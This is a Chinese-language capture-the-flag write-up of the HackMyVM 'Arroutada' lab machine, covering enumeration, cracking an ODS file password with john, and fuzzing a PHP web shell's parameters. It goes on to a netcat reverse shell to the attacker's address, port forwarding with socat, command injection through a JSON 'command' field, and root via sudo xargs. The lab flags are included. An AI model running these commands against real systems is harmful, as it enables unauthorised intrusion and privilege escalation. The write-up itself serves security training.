HackMyVM Arroutada
信息收集
端口扫描
root@kali:~# nmap 192.168.100.55 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 02:13 EDT
Nmap scan report for 192.168.100.55
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:86:58:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds80端口 :
只有黑手
目录枚举
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 59]
/imgs (Status: 301) [Size: 315] [--> http://192.168.100.55/imgs/]
/scout (Status: 301) [Size: 316] [--> http://192.168.100.55/scout/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 312995 / 1102800 (28.38%)^Cimgs 没有什么有用的东西
/scout 中有几句话
说游戏写重要的文档,但是不知道第一个路径是什么, 那我们再扫一遍目录
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55//scout/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55//scout/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,js,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 779]
/.html (Status: 403) [Size: 279]
/download (Status: 301) [Size: 325] [--> http://192.168.100.55/scout/download/]
/img (Status: 301) [Size: 320] [--> http://192.168.100.55/scout/img/]
/1 (Status: 301) [Size: 318] [--> http://192.168.100.55/scout/1/]
/links (Status: 301) [Size: 322] [--> http://192.168.100.55/scout/links/]
/content (Status: 301) [Size: 324] [--> http://192.168.100.55/scout/content/]
/html (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/html/]
/data (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/data/]
/java (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/java/]
/exploits (Status: 301) [Size: 325] [--> http://192.168.100.55/scout/exploits/]
/scan (Status: 301) [Size: 321] [--> http://192.168.100.55/scout/scan/]
/j1 (Status: 301) [Size: 319] [--> http://192.168.100.55/scout/j1/]
/j2 (Status: 301) [Size: 319] [--> http://192.168.100.55/scout/j2/]
/bye (Status: 301) [Size: 320] [--> http://192.168.100.55/scout/bye/]
/spell (Status: 301) [Size: 322] [--> http://192.168.100.55/scout/spell/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]扫出来了特别多目录 大部分都是空的
刚刚那个网页上写了 j1 我就尝试 并没有, 尝试了一下 j2
# pass.txt
user:password# z206
Ignore z*, please
Jabatito逛了一圈只有pass.txt 和 z206是有内容的 让我忽略这些z文件
有一个 shellfile.ods excel 是可以打开ods的 但是我电脑上没有excel只有wps, 所以网上随便找了一个在线查看网站打开了一下 提示有密码 试了pass.txt 不对
查到ods 密码可以用john跑
root@kali:~# libreoffice2john shellfile.ods > tmproot@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (ODF, OpenDocument Star/Libre/OpenOffice [PBKDF2-SHA1 256/256 AVX2 8x BF/AES])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (crypto [0=Blowfish 1=AES]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john11 (shellfile.ods)
1g 0:00:00:51 DONE (2025-05-07 02:46) 0.01953g/s 323.1p/s 323.1c/s 323.1C/s lachina..emmanuel1
Use the "--show --format=ODF" options to display all of the cracked passwords reliably
Session completed.
进入这个 php 里面一片空白 前边提示 fuzz
root@kali:~# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.55/thejabasshell.php?FUZZ=id --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.55/thejabasshell.php?FUZZ=id
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000457: 200 0 L 5 W 33 Ch "a"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0
a 参数加入后,说还需要 b 参数 爆破一下 b 参数
root@kali:~# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.55/thejabasshell.php?a=id\&b=FUZZ --hh 33
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.55/thejabasshell.php?a=id&b=FUZZ
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003033: 200 1 L 3 W 54 Ch "pass"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0b 参数为pass 返回值不一样
命令成功执行了
反弹Shell
http://192.168.100.55/thejabasshell.php?a=nc%20-c%20bash%20192.168.100.100%209001&b=pass
User提权
一通查找后发现
www-data@arroutada:/tmp$ more /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * drito /home/drito/service有一个计划任务 传入pspy64 查看
开了一个web 我是用了socat把端口转发出来了
./socat TCP-LISTEN:4444,fork TCP4:127.0.0.1:8000 &
有一个 brainfuck 加密的
没什么鸟用
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.55:4444 --exclude-length 319
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.55:4444
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 319
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/priv.php (Status: 200) [Size: 308]扫出来一个 php
Error: the "command" parameter is not specified in the request body. /* $json = file_get_contents('php://input'); $data = json_decode($json, true); if (isset($data['command'])) { system($data['command']); } else { echo 'Error: the "command" parameter is not specified in the request body.'; } */提示需要 command 参数 post读取json 数据
那我们使用 burp 重发一下
命令执行成功了
反弹 shell
UserFlag
drito@arroutada:~$ cat user.txt
785f64437c6e1f9af6aa1afcc91ed27cRoot提权
drito@arroutada:~$ sudo -l
Matching Defaults entries for drito on arroutada:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User drito may run the following commands on arroutada:
(ALL : ALL) NOPASSWD: /usr/bin/xargshttps://gtfobins.github.io/gtfobins/xargs/#sudo
sudo xargs -a /dev/null shRootFlag
root@arroutada:~# id
uid=0(root) gid=0(root) groups=0(root)
root@arroutada:~# cat root.txt
R3VuYXhmR2JGenlOYXFOeXlVbnB4WmxJWg==Flag经过了一些操作
Base64: GunaxfGbFzyNaqNyyUnpxZlIZ
ROT13 : ThanksToSmlAndAllHackMyVM